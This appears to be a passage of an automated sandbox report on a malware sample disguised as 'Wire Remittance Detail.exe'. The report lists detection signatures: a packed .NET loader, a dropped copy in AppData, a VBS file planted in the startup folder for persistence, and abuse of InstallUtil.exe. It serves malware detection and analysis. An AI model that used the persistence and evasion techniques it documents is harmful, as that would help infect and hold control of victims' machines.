                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Wire Remittance Detail.exe, PortableEnumerator.cs.Net Code: EnumerateBasicEnumerator System.AppDomain.Load(byte[])
                    Source: AssemblyFullName.exe.0.dr, PortableEnumerator.cs.Net Code: EnumerateBasicEnumerator System.AppDomain.Load(byte[])
                    Source: 0.2.Wire Remittance Detail.exe.42b3098.5.raw.unpack, PortableEnumerator.cs.Net Code: EnumerateBasicEnumerator System.AppDomain.Load(byte[])
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.5b50000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.442f68a.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.5b50000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.442f68a.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1105377682.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01530C6D push edi; retf 2_2_01530C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01530CCC push edi; retf 2_2_01530C7A
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F8937 push es; ret 5_2_063F8950
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeCode function: 5_2_063F255A push es; ret 5_2_063F256C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EE0C6D push edi; retf 6_2_00EE0C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_062F34DA push es; retf 6_2_062F34E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_062F3A40 push FC063EDAh; retf 6_2_062F3A4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0630FFB0 push es; ret 6_2_0630FFC0
                    Source: Wire Remittance Detail.exeStatic PE information: section name: .text entropy: 7.992784525923971
                    Source: AssemblyFullName.exe.0.drStatic PE information: section name: .text entropy: 7.992784525923971
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeFile created: C:\Users\user\AppData\Roaming\AssemblyFullName.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
